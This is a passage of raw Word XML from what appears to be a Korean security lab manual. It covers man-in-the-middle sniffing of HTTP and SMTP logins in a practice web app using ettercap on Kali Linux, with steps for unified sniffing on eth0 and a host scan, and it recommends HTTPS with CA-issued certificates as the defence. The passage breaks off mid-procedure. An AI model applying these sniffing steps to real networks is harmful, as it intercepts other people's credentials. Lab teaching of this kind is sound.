          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve">페이지로 들어가면 </w:t>
      </w:r>
      <w:r w:rsidRPr="000C0D36">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:t>HTTP</w:t>
      </w:r>
      <w:r w:rsidRPr="000C0D36">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve">가 아닌 </w:t>
      </w:r>
      <w:r w:rsidRPr="000C0D36">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:t>HTTPS</w:t>
      </w:r>
      <w:r w:rsidRPr="000C0D36">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:t>로 연결</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6755338E" w14:textId="721967A5" w:rsidR="00AE7893" w:rsidRPr="000C0D36" w:rsidRDefault="00AE7893" w:rsidP="000C0D36">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:ind w:leftChars="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000C0D36">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">칼리 리눅스에서 </w:t>
      </w:r>
      <w:r w:rsidRPr="000C0D36">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:t>ettercap</w:t>
      </w:r>
      <w:r w:rsidRPr="000C0D36">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve">을 실행하고 </w:t>
      </w:r>
      <w:r w:rsidRPr="000C0D36">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:t>sm_mitm_1.php</w:t>
      </w:r>
      <w:r w:rsidRPr="000C0D36">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:t>페이지에서 로그인하여도 상태 표시 패널에는 아무 내용도 출력되지 않음</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AA7B9E2" w14:textId="6C27F800" w:rsidR="00AE7893" w:rsidRDefault="00AE7893" w:rsidP="00AE7893">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:ind w:leftChars="0" w:left="1160"/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F5F743" wp14:editId="431B98BC">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>1284605</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>177700</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1944303" cy="163830"/>
                <wp:effectExtent l="19050" t="19050" r="18415" b="2667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03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605DA" id="직사각형 39" o:spid="_x0000_s1026" style="position:absolute;left:0;text-align:left;margin-left:101.15pt;margin-top:14pt;width:153.1pt;height:12.9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" filled="f" strokecolor="#c00000" strokeweight="2.25pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidRPr="004D7CCA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="14BF4482" wp14:editId="2D91171A">
            <wp:extent cx="5760000" cy="4318567"/>
            <wp:effectExtent l="19050" t="19050" r="12700" b="2540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334"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5760000" cy="4318567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2F124" w14:textId="6B83F61D" w:rsidR="00AE7893" w:rsidRDefault="00AE7893" w:rsidP="00AE7893">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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중요한 정보를 전송하는 경우 H</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve">TTPS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:t>프로토콜을 사용하고,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> HTTPS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve">프로토콜로 중요 정보를 전송하려면 서버에 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve">SSL </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:t>인증서를 설치하여 암호화 설정을 해야 함.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6339A3FB" w14:textId="77777777" w:rsidR="00AE7893" w:rsidRDefault="00AE7893" w:rsidP="00AE7893">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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S</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve">SL </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve">인증서를 발급받으려면 공인 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:t>CA</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:t>를 통하여 인증서를 구매하여야 하며,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 xml:space="preserve">임의로 본인이 인증서를 발급하는 경우 신뢰할 수 없는 인증서라는 경고를 출력 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3554ACF9" w14:textId="6B2550CD" w:rsidR="00AE7893" w:rsidRDefault="00AE7893" w:rsidP="00AE7893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2D35C4" w:rsidRPr="003C4ACB" w14:paraId="1D4BF548" w14:textId="77777777" w:rsidTr="005E13EB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7C2B1EDD" w14:textId="30E6DAB9" w:rsidR="002D35C4" w:rsidRPr="003C4ACB" w:rsidRDefault="002D35C4" w:rsidP="005E13EB">
            <w:pPr>
              <w:pStyle w:val="a4"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="28"/>
              </w:numPr>
              <w:ind w:leftChars="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>SMTP</w:t>
            </w:r>
            <w:r w:rsidRPr="003C4ACB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</w:t>
            </w:r>
            <w:r w:rsidRPr="003C4ACB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공격과정</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="739B23B0" w14:textId="7C6097E4" w:rsidR="00AE7893" w:rsidRDefault="002D35C4" w:rsidP="00EF1860">
      <w:pPr>
        <w:ind w:firstLine="800"/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) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>보안 레벨 선택 및 시나리오 선택</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="441406F6" w14:textId="77777777" w:rsidR="002D35C4" w:rsidRDefault="002D35C4" w:rsidP="002D35C4">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:ind w:leftChars="0" w:left="1494"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002D35C4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>①</w:t>
      </w:r>
      <w:r w:rsidRPr="002D35C4">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Main-in-the-Middle Attack (HTTP)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13B710F4" w14:textId="4BBB43E8" w:rsidR="002D35C4" w:rsidRPr="002D35C4" w:rsidRDefault="002D35C4" w:rsidP="002D35C4">
      <w:pPr>
        <w:ind w:left="694" w:firstLineChars="400" w:firstLine="800"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002D35C4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>②</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002D35C4">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">low </w:t>
      </w:r>
      <w:r w:rsidRPr="002D35C4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">선택 후, set 클릭 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41AAAF03" w14:textId="524141A5" w:rsidR="003C14C9" w:rsidRDefault="00DA2D7E" w:rsidP="002D35C4">
      <w:pPr>
        <w:ind w:firstLineChars="700" w:firstLine="14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0C8C2CD" wp14:editId="1F9C386B">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>4116758</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1001312</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1905712" cy="356965"/>
                <wp:effectExtent l="19050" t="19050" r="18415" b="24130"/>
                <wp:wrapNone/>
                <wp:docPr id="134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712" cy="3569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1423F" id="직사각형 134" o:spid="_x0000_s1026" style="position:absolute;left:0;text-align:left;margin-left:324.15pt;margin-top:78.85pt;width:150.05pt;height:28.1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" filled="f" strokecolor="#c00000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EC5094C" wp14:editId="3D1D383D">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>4140539</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>769003</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1905712" cy="179462"/>
                <wp:effectExtent l="19050" t="19050" r="18415" b="11430"/>
                <wp:wrapNone/>
                <wp:docPr id="133" name="직사각형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712" cy="1794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27B56" id="직사각형 133" o:spid="_x0000_s1026" style="position:absolute;left:0;text-align:left;margin-left:326.05pt;margin-top:60.55pt;width:150.05pt;height:14.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" filled="f" strokecolor="#c00000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6A99928" wp14:editId="34EFB50F">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>1961260</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>315690</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1905712" cy="179462"/>
                <wp:effectExtent l="19050" t="19050" r="18415" b="11430"/>
                <wp:wrapNone/>
                <wp:docPr id="132" name="직사각형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712" cy="1794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17000" id="직사각형 132" o:spid="_x0000_s1026" style="position:absolute;left:0;text-align:left;margin-left:154.45pt;margin-top:24.85pt;width:150.05pt;height:14.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" filled="f" strokecolor="#c00000" strokeweight="2.25pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="002D35C4" w:rsidRPr="002D35C4">
        <w:rPr>
          <w:b/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4C66E20F" wp14:editId="6792E6B6">
            <wp:extent cx="5760000" cy="1537688"/>
            <wp:effectExtent l="19050" t="19050" r="12700" b="2476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37688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BBAC50" w14:textId="1A45DD5A" w:rsidR="005E13EB" w:rsidRPr="005E13EB" w:rsidRDefault="005E13EB" w:rsidP="005E13EB">
      <w:pPr>
        <w:ind w:left="426" w:firstLine="374"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">2) </w:t>
      </w:r>
      <w:r w:rsidR="00740769">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>S</w:t>
      </w:r>
      <w:r w:rsidR="00740769">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">MTP </w:t>
      </w:r>
      <w:r w:rsidR="00740769">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>정보 스니핑</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77CE67CE" w14:textId="5E217741" w:rsidR="005E13EB" w:rsidRPr="005E13EB" w:rsidRDefault="005E13EB" w:rsidP="005E13EB">
      <w:pPr>
        <w:ind w:left="1226" w:firstLine="374"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005E13EB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>①</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005E13EB">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">ettercap </w:t>
      </w:r>
      <w:r w:rsidRPr="005E13EB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>툴 실행</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="461E96D1" w14:textId="086BD41C" w:rsidR="005E13EB" w:rsidRPr="005E13EB" w:rsidRDefault="005E13EB" w:rsidP="005E13EB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003C4ACB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3C4ACB">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"># ettercap –G </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi"/>
          <w:b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또는 </w:t>
      </w:r>
      <w:r w:rsidRPr="00976082">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> [</w:t>
      </w:r>
      <w:r w:rsidRPr="00976082">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>K</w:t>
      </w:r>
      <w:r w:rsidRPr="00976082">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">ali linux] </w:t>
      </w:r>
      <w:r w:rsidRPr="00976082">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidRPr="00976082">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> [프로그램] </w:t>
      </w:r>
      <w:r w:rsidRPr="00976082">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidRPr="00976082">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> [sniffing &amp; Spoofing] </w:t>
      </w:r>
      <w:r w:rsidRPr="00976082">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidRPr="00976082">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>[ettercap]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E8C9A8F" w14:textId="77777777" w:rsidR="005E13EB" w:rsidRDefault="005E13EB" w:rsidP="005E13EB">
      <w:pPr>
        <w:ind w:left="476" w:firstLine="800"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F2644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09D902B" wp14:editId="17B0B085">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>833675</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>60896</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1865871" cy="210065"/>
                <wp:effectExtent l="19050" t="19050" r="20320" b="19050"/>
                <wp:wrapNone/>
                <wp:docPr id="114" name="직사각형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871" cy="210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FA6EA" id="직사각형 114" o:spid="_x0000_s1026" style="position:absolute;left:0;text-align:left;margin-left:65.65pt;margin-top:4.8pt;width:146.9pt;height:16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" filled="f" strokecolor="#c00000" strokeweight="2.25pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="나눔스퀘어_ac" w:eastAsia="나눔스퀘어_ac" w:hAnsi="나눔스퀘어_ac"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70708B32" wp14:editId="2898F5C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772275" cy="10081452"/>
                <wp:effectExtent l="0" t="0" r="9525" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="115" name="직사각형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00814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96159" id="직사각형 115" o:spid="_x0000_s1026" style="position:absolute;left:0;text-align:left;margin-left:0;margin-top:0;width:533.25pt;height:793.8pt;z-index:-25146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  <w:r w:rsidRPr="00F26441">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0F1A7E09" wp14:editId="1F1E1A83">
            <wp:extent cx="5760000" cy="605538"/>
            <wp:effectExtent l="19050" t="19050" r="12700" b="2349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05538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121022" w14:textId="0C8B2041" w:rsidR="005E13EB" w:rsidRPr="005E13EB" w:rsidRDefault="005E13EB" w:rsidP="005E13EB">
      <w:pPr>
        <w:ind w:left="1226" w:firstLine="374"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005E13EB">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>②</w:t>
      </w:r>
      <w:r w:rsidRPr="005E13EB">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> [Sniff] – [Unified Sniffing] – [eth0] </w:t>
      </w:r>
      <w:r w:rsidRPr="005E13EB">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">선택 후, 확인 </w:t>
      </w:r>
      <w:r w:rsidRPr="005E13EB">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="370193F6" w14:textId="77777777" w:rsidR="005E13EB" w:rsidRPr="00976082" w:rsidRDefault="005E13EB" w:rsidP="005E13EB">
      <w:pPr>
        <w:ind w:firstLineChars="700" w:firstLine="1400"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F2644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306CDBC" wp14:editId="294FFE43">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>5387262</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>31750</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="236220" cy="252730"/>
                <wp:effectExtent l="19050" t="19050" r="11430" b="13970"/>
                <wp:wrapNone/>
                <wp:docPr id="116" name="직사각형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27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B4DA" id="직사각형 116" o:spid="_x0000_s1026" style="position:absolute;left:0;text-align:left;margin-left:424.2pt;margin-top:2.5pt;width:18.6pt;height:19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" filled="f" strokecolor="#c00000" strokeweight="2.25pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidRPr="00F26441">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5DDCD637" wp14:editId="2B5E9BAC">
            <wp:extent cx="5760000" cy="3239146"/>
            <wp:effectExtent l="19050" t="19050" r="12700" b="1841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1564"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5760000" cy="3239146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1344" w14:textId="5C9B438C" w:rsidR="005E13EB" w:rsidRPr="005E13EB" w:rsidRDefault="005E13EB" w:rsidP="005E13EB">
      <w:pPr>
        <w:ind w:left="1276" w:firstLine="324"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005E13EB">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>③</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005E13EB">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>호스트 스캔</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="626DFBCE" w14:textId="700A459A" w:rsidR="005E13EB" w:rsidRPr="00976082" w:rsidRDefault="005E13EB" w:rsidP="005E13EB">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:ind w:leftChars="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00976082">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>[Host]-[Scan for hosts]-[Host list]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30620174" w14:textId="74E5DAC2" w:rsidR="005E13EB" w:rsidRDefault="005E13EB" w:rsidP="005E13EB">
      <w:pPr>
        <w:ind w:left="476" w:firstLineChars="500" w:firstLine="1000"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F26441">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7AA73F30" wp14:editId="36F7BDBC">
            <wp:extent cx="5760000" cy="3194864"/>
            <wp:effectExtent l="19050" t="19050" r="12700" b="2476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4864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0631CD" w14:textId="61B4F131" w:rsidR="005E13EB" w:rsidRDefault="005E13EB" w:rsidP="005E13EB">
      <w:pPr>
        <w:ind w:left="476" w:firstLine="800"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7595DC02" w14:textId="77777777" w:rsidR="005E13EB" w:rsidRDefault="005E13EB" w:rsidP="005E13EB">
      <w:pPr>
        <w:ind w:left="476" w:firstLine="800"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3ADE7D08" w14:textId="3A43D9CB" w:rsidR="005E13EB" w:rsidRPr="005E13EB" w:rsidRDefault="005E13EB" w:rsidP="005E13EB">
      <w:pPr>
        <w:ind w:left="1276" w:firstLine="190"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005E13EB">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>④</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
          <w:b/>
          <w:bCs/>
